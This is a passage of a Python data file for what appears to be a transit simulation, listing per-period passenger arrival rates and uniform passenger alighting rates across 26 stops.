(6.377108486227438, 4.460695990777558, 5.84494005084676, 5.928284721242486, 5.318565559990731, 2.653359430965997, 1.9959137000985407, 2.040131521958481, 2.943966154271756, 1.0425350433782987, 0.8231601917777163, 0.49496031669067847, 0.0, 7.092091472985131, 5.444563483597462, 4.115800958888581, 3.1276051301348957, 5.887932308543512, 2.8561841307418736, 1.9959137000985407, 1.8952567364042836, 2.6592827799953653, 1.9760949070808291, 1.1689880101693522, 0.40551781734341447, 0.0), # 175
(6.053756596356447, 4.230642521821194, 5.554371278048459, 5.631280344243462, 5.053687435395322, 2.5224795681812964, 1.8939592581220606, 1.9396989650580787, 2.7994658224804327, 0.9898835721103237, 0.781686991169637, 0.470123434005421, 0.0, 6.738558549518844, 5.17135777405963, 3.9084349558481852, 2.9696507163309707, 5.5989316449608655, 2.71557855108131, 1.8939592581220606, 1.8017711201294973, 2.526843717697661, 1.8770934480811543, 1.1108742556096918, 0.38460386562010856, 0.0), # 176
(5.7280619775707065, 3.9995226777479713, 5.260807046571258, 5.331571710762027, 4.786152139565322, 2.3900884111247205, 1.791385339933044, 1.8380772565365193, 2.6531860962191995, 0.9368193601718788, 0.7398709077942084, 0.4450672367000743, 0.0, 6.381538598017975, 4.895739603700816, 3.699354538971042, 2.8104580805156356, 5.306372192438399, 2.5733081591511273, 1.791385339933044, 1.707206007946229, 2.393076069782661, 1.7771905702540096, 1.0521614093142517, 0.3635929707043611, 0.0), # 177
(5.401123804034416, 3.7680724765129963, 4.9653038889892835, 5.030210781404673, 4.516916855968639, 2.2566741803869648, 1.6885291845908623, 1.7356435858355217, 2.505674738265573, 0.8835238138185378, 0.6978561843722264, 0.41987918150285664, 0.0, 6.022304637759553, 4.618670996531422, 3.489280921861132, 2.6505714414556127, 5.011349476531146, 2.4299010201697304, 1.6885291845908623, 1.611910128847832, 2.2584584279843196, 1.6767369271348913, 0.9930607777978567, 0.34255204331936334, 0.0), # 178
(0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0), # 179
)
passenger_allighting_rate = (
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 0
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 1
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 2
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 3
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 4
    # Rows 5–81: 77 identical tuples (0.07692307692307693 == 1/13), expanded via iterable unpacking
    *([(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1)] * 77),
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 82
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 83
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 84
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 85
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 86
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 87
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 88
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 89
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 90
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 91
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 92
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 93
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 94
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 95
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 96
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 97
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 98
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 99
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 100
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 101
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 102
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 103
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 104
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 105
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 106
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 107
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 108
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 109
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 110
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 111
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 112
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 113
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 114
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 115
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 116
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 117
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 118
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 119
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 120
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 121
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 122
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 123
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 124
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 125
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 126
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 127
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 128
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 129
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 130
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 131
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 132
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 133
